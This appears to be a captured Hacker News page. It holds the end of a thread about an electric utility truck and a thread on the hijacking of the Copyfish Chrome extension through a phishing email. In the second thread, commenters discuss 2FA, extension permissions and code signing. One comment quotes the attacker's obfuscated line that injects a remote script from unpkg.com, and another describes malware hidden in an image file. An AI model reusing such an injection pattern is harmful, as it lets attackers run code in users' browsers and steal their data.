but... the complex suspension worries me. Fungibility or flexibility, yes, but massive adjustability sounds fragile and complex. Dual drive, sure, but it must have some sort of LSD, which isn't mentioned. 200 miles is a really short range. I can do 300+ on my stock tank and it's not enough. Last 4-day weekend in the Cascades/Palouse/Okanogan was about 700 miles. Practical recharging in the rural/wilds is... unlikely.

As mentioned, until there's real capital and manufacturing this is vaporware. I'm also skeptical of $60,000; I'll bet real money against that. Icon, a small-batch truck manufacturer with a real product, is more like $100-150,000 and up.

Edit: entry and exit angles look nice. Real curious how that "plate" style chassis handles flex.

willvarfar 3 days ago 1 reply      
Given that it doesn't need a bonnet, it's a shame it isn't styled more on https://en.wikipedia.org/wiki/Volvo_L3314

But I definitely want one! :)

Shivetya 3 days ago 0 replies      
I still think the best place for this is school buses: you know where they will be parked and their exact routes, plus you get kids and parents used to electric vehicles in everyday use.

Yes, they are expensive, but all it takes is a spike in gas prices to seriously hurt some districts that got hit hard the last time prices went high.

There are many markets for vehicles with set operating ranges and known routes. EV tech isn't near replacing combustion in many cases, but in tightly controlled instances it does work. (Range, charging, weather, and cost are the four areas all being worked on and all needing work.)

dghughes 3 days ago 1 reply      
His frustration with his trucks, I bet, is because they were powered by gas. Trucks should only be diesel: you don't need horsepower (covering a distance quickly), you need leverage, a.k.a. torque.

A documentary on Sherman tanks amazed me because they were gas powered, and when hit the gasoline exploded. German tanks were powered by diesel. The US has hated diesel from day one; it's amazing.

But electric has tons of torque by design, so it should be suitable. But I wonder if the horsepower can be dialed down for more range?

vivekd 3 days ago 0 replies      
I wonder why there aren't more EV trucks on the road; a trucking company would be more willing to absorb the higher initial cost of an electric truck in order to save on fuel down the line. Is it because EVs can't effectively compete on fuel costs against the long range you get with diesel? Or is it just short-sightedness among manufacturers?

EDIT: actually looks like I spoke too soon:

Vinalin 3 days ago 0 replies      
I feel there's a huge lack of electric/hybrid vehicles in the truck/pickup space, although for understandable reasons. However, I've heard of a company that's working on a fleet version of an electric pickup truck, and I think they're now looking for client interest.[0]

The caveat is that it's not fully electric: 80 miles all-electric, and then the generator kicks in, giving it 310 miles per tank. Still, pretty good gas mileage, and safety was definitely a concern.

[0]: http://workhorse.com/

6stringmerc 4 days ago 1 reply      
Fascinating approach and re-thinking of a utility vehicle. I'm thinking the 10,000 - 20,000 units is pretty ambitious. Hence why The Verge politely just mentions that Bollinger hasn't figured out a "final price" yet but fails to mention what a "current estimate of final price" might be.

When I think of utility vehicles, I think of Defender 90 and Toyota Hilux type vehicles - spartan, proven, reparable in many parts of the world. When I think of a new car model, even from large manufacturers, I get the jitters of being a first-adopter. So much gets learned and shaken out by real-world, human use. Nice idea, but I'm a dreamer at heart and through receiving lots of pragmatic feedback, I kind of see this through the same lens.

cr0sh 3 days ago 1 reply      
Well - it's nice to finally see another potential player in this arena; we've seen this one I think:


But both of these are well outside of my price range. But it has to start somewhere.

The thing I've feared/worried about when it has come to the push for electric, and self-driving vehicles, and the recent rumblings by France and the UK to ban ICE vehicles in the near future - is that those who enjoy off-roading are being left out.

carsongross 3 days ago 0 replies      
Dear Toyota: look at this truck, and at the FJ40, and get to work.
guntars 3 days ago 0 replies      
They should add a 3kW+ inverter option to use all your favorite electric tools in the field, making this basically a large battery on wheels.
athenot 3 days ago 0 replies      
Great low-speed torque and hydraulic suspension would be great features for offroading, especially crawling on really tricky/fun terrain.
dsfyu404ed 3 days ago 1 reply      
It had better be a lot cheaper than an F150.

Nobody who wants a truck for truck stuff is gonna put up with the downsides of electric, the NVH of a '60s panel van, and a 200mi range unless it costs much less than vehicles with equivalent performance.

The people who buy electric to make a statement about their preference in power sources are not the people who will buy a bare-bones truck.

frik 3 days ago 0 replies      
Looks like this is inspired by the famous Mercedes G/Puch G.

For more than three decades it has been well known for its boxy style and its benefits: https://en.wikipedia.org/wiki/Mercedes-Benz_G-Class (scroll down for pictures)

simonb 3 days ago 0 replies      
Looks really interesting and promising, but why didn't they make it forward-control like the Land Rover FC101?
yellowapple 4 days ago 0 replies      
I've been dreaming of a car like this for a long while now. Even down to its boxy look and the fact that it looks like it won't get stuck in an inch-high snow drift.

They won't even start accepting deposits until 2018, apparently. Gives me more time to save up for this beauty.

rhspeer 4 days ago 1 reply      
This could be a nice acquisition by Jeep/Chrysler since they're lagging behind in EV development due to lack of funds.

It would also help get the taste of the Compass & Patriot horseshit they've been peddling lately out of everyone's mouth.

That's some beautiful vaporware, I hope they make it.

alkonaut 3 days ago 0 replies      
Cool. But it's DOA if it doesn't meet safety standards. People might accept 4/5 NCAP stars but not for a premium car. Lack of airbag is concerning but might be fixed before the production model is finished I suppose.
0xbear 3 days ago 0 replies      
That steering column will look mighty impressive when the driver impales herself on it in a crash. I wonder what NHTSA thinks of non-crumpling columns and steering wheels with no air bag.
kevin_thibedeau 2 days ago 0 replies      
Wonder what the range would be if it didn't have the aerodynamics of a brick.
bobwaycott 3 days ago 0 replies      
It's an electric Land Rover Defender clone. Still cool, though. But definitely not original in design at all.
bitJericho 3 days ago 0 replies      
Is this the next DMC? I don't know. But I want one!
goneri 3 days ago 0 replies      
If you are also confused by the units:

360HP: 268kW, 200 mile: 321.869km
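The arithmetic behind those figures (1 hp ≈ 745.7 W, 1 mile = 1.609344 km):

```javascript
// Unit conversions for the headline specs.
const kW = 360 * 745.7 / 1000; // 268.452 → ≈268 kW
const km = 200 * 1.609344;     // 321.8688 → ≈321.869 km
```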

jacobmarble 4 days ago 1 reply      
"He just happens to be doing it in the middle of goddamned nowhere."

I left Southern California for this. My current employer is hiring software engineers in Sandpoint, Idaho.


sabujp 3 days ago 0 replies      
was expecting a semi truck
geiseric 4 days ago 0 replies      
Looks like my Land Rover.
towndrunk 3 days ago 0 replies      
Needs a hood scoop. :)
flareback 4 days ago 2 replies      
It's not a truck
olegkikin 4 days ago 2 replies      
Don't they need their own battery gigafactory to scale the production?
backtoyoujim 3 days ago 0 replies      
Reminds me of Maurice Wilks' early Land Rover designs.
apl002 3 days ago 0 replies      
dat truck is sexy
frabbit 4 days ago 1 reply      
Hopefully these will be restricted to use on farmland instead of being inappropriately paraded in suburban areas.

Electric vehicles are not "clean", they're merely cleaner.

Our Copyfish extension was stolen and adware-infested a9t9.com
326 points by timr  1 day ago   200 comments top 30
krackers 1 day ago 7 replies      
I guess this is as good a place as any to post that I noticed something similar had happened to [User-Agent Switcher for Google Chrome](https://chrome.google.com/webstore/detail/user-agent-switche...) and [Block Site](https://chrome.google.com/webstore/detail/block-site/eiimnmi...). The "report abuse" link on the page is useless. The former is very insidious in that it actually hides the malware in a .jpg file that appears benign at first (promo.jpg for anyone who wants to analyze) but when loaded in a canvas element and decoded in some manner yields js that goes on to send all the user's http requests to some domain while also injecting ads and redirecting to affiliate links.
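For readers unfamiliar with the trick: hiding a payload in an image usually means steganography, spreading the payload's bits across the low-order bits of pixel bytes, where they are visually invisible. The sketch below illustrates the general idea in plain JavaScript; it is not the extension's actual code (which reportedly drew promo.jpg into a canvas and decoded the pixel data):

```javascript
// Illustrative steganography sketch: write each payload bit into the
// least-significant bit of one "pixel" byte, then read them back out.
function hide(payload, pixels) {
  const bytes = Buffer.from(payload, "utf8");
  bytes.forEach((byte, i) => {
    for (let bit = 0; bit < 8; bit++) {
      const j = i * 8 + bit;
      pixels[j] = (pixels[j] & 0xfe) | ((byte >> bit) & 1);
    }
  });
  return pixels;
}

function extract(pixels, length) {
  const bytes = Buffer.alloc(length);
  for (let i = 0; i < length; i++) {
    for (let bit = 0; bit < 8; bit++) {
      bytes[i] |= (pixels[i * 8 + bit] & 1) << bit;
    }
  }
  return bytes.toString("utf8");
}

// 8 payload bytes need 64 carrier bytes; 0x80 stands in for pixel data.
const pixels = hide("alert(1)", Buffer.alloc(64, 0x80));
const recovered = extract(pixels, 8); // "alert(1)"
```

The point for reviewers: a static scan of the extension sees only an image and an innocuous-looking decode loop, which is why this evades casual inspection.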
jeswin 1 day ago 5 replies      
Chrome's security policy is surprisingly poor and is the reason why I stay away from most extensions. "Read data from all websites" is like root on the phone. It should be allowed only via deliberate, explicit user action. While this will be an interesting UX challenge, defaulting to domain-specific permissions is the sane thing to do in this age.

Case in point, I don't care about a readability or bookmarking plugin reading a news link, but it shouldn't read my bank page.
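For reference, Chrome's manifest already supports narrower grants than "read data from all websites"; the friction is that most extensions simply ask for everything. A hypothetical manifest fragment (names and domain are illustrative) restricting an extension to one site plus the user-invoked active tab:

```json
{
  "name": "Hypothetical bookmarking extension",
  "version": "1.0",
  "manifest_version": 2,
  "permissions": [
    "activeTab",
    "https://news.example.com/*"
  ]
}
```

`activeTab` grants access only after a deliberate user gesture on the current tab, which is close to the explicit-action model argued for above.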

IncRnd 1 day ago 7 replies      
> "Click here to read more details" the email said. The click opened the Google password dialog, and the unlucky team member entered the password for our developer account. This looked all legit to the team member, so we did not notice the pishing attack as such at this point. Pishing for Chrome extensions was simply not on our radar screen.

First, it is excellent that you disclosed the issue.

Second, based upon the quoted text you really aren't accepting responsibility for having been phished. The team member wasn't "unlucky." Your "radar" shouldn't trick you into thinking you won't be attacked.

timdorr 1 day ago 1 reply      
Looks like they are using unpkg.com and npm to distribute the badware:



I reached out to both services to have it shut down. Hopefully that will at least kill it temporarily.

joshschreuder 1 day ago 1 reply      
A similar attack happened on another Chrome extension last month (Social Fixer) with over 190k installs.

In fact, judging by the exploit code, I would guess the same author, as the Social Fixer attack had a very similar hashed package on Unpkg as well.

In that scenario the author also didn't have 2FA enabled:https://www.facebook.com/socialfixer/posts/10155117415829342

I feel like Google should take the next step of requiring all extension developers to enable 2FA before being able to post an extension.

mikegerwitz 1 day ago 1 reply      
This is why it is important to cryptographically sign releases. Browsers are a huge problem with this.

All of the software I use is signed at some point in the chain (be it by the actual author or by the package manager, who'd better be verifying signatures if they're available, otherwise at least not blindly updating), _except for my browser extensions_. Most of it is also _reproducible_! I can get around this for some things---I use GNU Guix in addition to Debian, and they package some extensions. I need to start using them.

Of course, the signature should really come from the actual author, not the package maintainer for a particular distro; there's room for error. In the case of a project being hijacked (e.g. Copyfish), hopefully a maintainer would notice. Git commit and tag signing is an easy way to do this if you don't separately sign releases; package maintainers should be building from source.

In the case of Copyfish: if the browser validated signatures from the authors, then this would have been thwarted.

(Maybe there are some code-signing protections in place? I'm not an extension developer for either Chromium or Firefox; please let me know if something does exist!)

flyGuyOnTheSly 1 day ago 2 replies      
This is the second extension that I use on chrome that has been hijacked.

The first was Live HTTP Headers [0]

I have never had this experience on Firefox.

Is it simply a matter of Chrome being a bigger target?

[0] https://www.webmasterworld.com/webmaster/4829365.htm

userbinator 1 day ago 0 replies      
The somewhat obfuscated JS downloaded from unpkg.com has what appears to be a Google Analytics ID in it: UA-103045553-1. I'm not sure if that can help trace the origin.
busterarm 1 day ago 0 replies      
It's a bad weekend for Chrome Extensions, it seems.


gargravarr 1 day ago 0 replies      
Spear phishing is remarkably effective, even against tech-savvy people. One of the most alarming aspects is that we've become trained to click links in emails as soon as we see some trustworthy indication, be it something we were expecting, a spoofed sender, or a copy of Google's layout, further reinforced by an accurate login-page clone.

I think the best defence here is to condition ourselves out of this behaviour. If you receive a link in an email, don't click it - view the source or paste it into a text document and examine it. And if you aren't expecting an email, such as Google emailing out of the blue, go to the known-trusted site and see if there's any pending notifications.

Seems we need to stop trusting email.
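One concrete version of "examine it": parse the link and look at the actual hostname rather than the anchor text. The WHATWG URL parser is built into Node and modern browsers (the addresses below are illustrative, not the attacker's real link):

```javascript
// The hostname of a parsed URL is what the browser will actually contact,
// regardless of what the link's display text claims.
function realHost(link) {
  return new URL(link).hostname;
}

realHost("https://bit.ly/2abcdef");            // "bit.ly" — not google.com
realHost("https://accounts.google.com/login"); // "accounts.google.com"
```

A shortener hostname on a supposed account-security mail is exactly the mismatch that should stop the click.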

ivanbakel 1 day ago 2 replies      
Good reminder that you should never be in the mindset of "expecting" a phish from any source - trust is how they get you. Also, if a message was really urgent, you wouldn't have to click-through to see it.
bjornstar 1 day ago 0 replies      
I've gotten this phishing e-mail 3 times over the past month or so. The first time I almost fell for it.

Looking at the attacker's code, they are currently trying to steal cloudflare api keys in addition to stealing cookies from all sites the extension users visit :(

yrro 5 hours ago 0 replies      
Debian patched the Chromium browser to refuse to install or update add-ons from the Chrome store. At first I found this annoying, but I am coming around to their way of thinking--that ultimately I can only trust software in the Debian archive.
staticautomatic 1 day ago 2 replies      
Of course it's a phishing attack. Why would Google send you a bit.ly link to your own Google account?
tedunangst 1 day ago 0 replies      
Something to be said about auto updating software...
thadk 1 day ago 0 replies      
FYI, This "Better History" extension in Chrome has a history of selling browser history since it was sold by its developer: https://chrome.google.com/webstore/detail/better-history/obc...

They frequently remove it from the store when people notice and restore it a month or so later.

The comments over the past year or so detail the symptoms of spyware. The "Report Abuse" button in Chrome Store feels useless.

Cthulhu_ 1 day ago 0 replies      
No 2FA? No additional password / 2FA challenge when a big, dangerous operation like moving an extension to another account is triggered?
sgroppino 1 day ago 3 replies      
I'd have thought that two-factor authentication could have prevented this type of attack?
tarosnow 1 day ago 0 replies      
You can use the Chrome Apps & Extensions Developer Tools[1] to monitor the activity of your apps and extensions.

[1]: https://chrome.google.com/webstore/detail/chrome-apps-extens...

sunnyps 1 day ago 0 replies      
Please use Google's "Password Alert" Chrome extension to protect your Google account. It will notify you if you accidentally enter your Google password on another website.
cgb223 1 day ago 2 replies      
Can someone explain to me why the attacker wrote the script source tag as

 "var config_fragment = '<sc' + 'ript sr' + 'c="ht'+ 'tps://un' + 'p' + 'kg.com/' + hash + '/' + hour + '.js"></sc ' + 'ript>';"
Instead of just:

 var config_fragment = '<script src="https://unpkg.com/' + hash + '/' + hour + '.js"></script>';

jwilk 1 day ago 1 reply      
> Back to standard, text-based email as the default.

Yeah, but what will you do when you receive an HTML-only mail, or a mail with a text/plain alternative saying "lol, get a better MUA", or a mail with a text/plain alternative so mangled it can't be read without making your brain hurt?

All these are common occurrences in automatically sent e-mails these days.

interfixus 1 day ago 0 replies      
tl;dr: A member of the development team thought it unexceptional and credible that Google should be using a clickable bit.ly url in an unsolicited email asking for login and update.

The world is an uphill kind of place.

Endy 1 day ago 2 replies      
While I understand how some people can take this as a cautionary tale in favor of 2FA, as someone who doesn't like it and won't use it, I guess my mindset is very simple. There's the old saw that over time, computing has evolved from smart people in front of dumb terminals into dumb people in front of "smart" terminals. This attack is proof of it; while 2FA might have had an impact, the major issue here is that we had a dumb person - this "unlucky" team member - who either didn't have the training or the common sense to understand that if you have a public presence on the Internet, you are a target. If you have auto-updating software installed on more than one machine, you are going to be someone's target, because they want access to those machines.

The lesson here is: never trust anyone or anything.

shawn-butler 1 day ago 0 replies      
>> We are trying to contact Google, but so far, have been unable to reach any human being that can help.

So typical, unfortunately.

_Codemonkeyism 1 day ago 0 replies      
"This looked all legit to the team member" sure the team member checked the URL of the password screen? Yes, and Google using Freshdesk.
Rainymood 1 day ago 1 reply      
(In the article "phishing" is consistently misspelled as "pishing".)
logicallee 1 day ago 3 replies      
We should never have to read a title like "disable immediately" from a developer in a news article. That is not how this should be distributed, even when the original developer is the one distributing the news.

Instead, Google should generate an emergency disable code that a developer can put into a simple web form from anywhere in the world, even if the developer has been locked out of every one of their accounts, which immediately centrally disables that extension.

How it should work.


1. "revocation code generation" and explanation. Text like: "this is a secret revocation code. Anyone who learns it can immediately disable your extension. Keep it secure and separate from all of your production systems. You will be able to use it even if locked out of all other access."

2. A web form people can submit revocation codes to, from anywhere with Internet access.

The code should be very high-entropy and generated by Google. However, it should not have ambiguous characters like 1 and capital I.

I personally would generate it using a dicewords-like wordlist. Also, I personally would ensure it had approximately 384 bits of total entropy, of which one third is a recovery checksum. This enables the developer to write many words down wrong and still be able to disable their extension. If the recovery record/checksum portion were used, I would offer the user the result "You appear to have made a mistake, which we could correct. Is this the correct disable key?" and then show the corrected version.

However, this last idea seems to be beyond the state of cryptography worldwide (i.e. for some reason I have written something that exceeds best practices worldwide, like I'm from the future or something), so I understand if Google's cryptographers don't implement this part.

The above seems a bit grandiose of me so here is the comment where I first wrote about this:


sneak 1 day ago 0 replies      
TLDR: Use FIDO hardware 2FA. The tokens are $15. No excuses.
nvr219 1 day ago 0 replies      
Always do a 2fa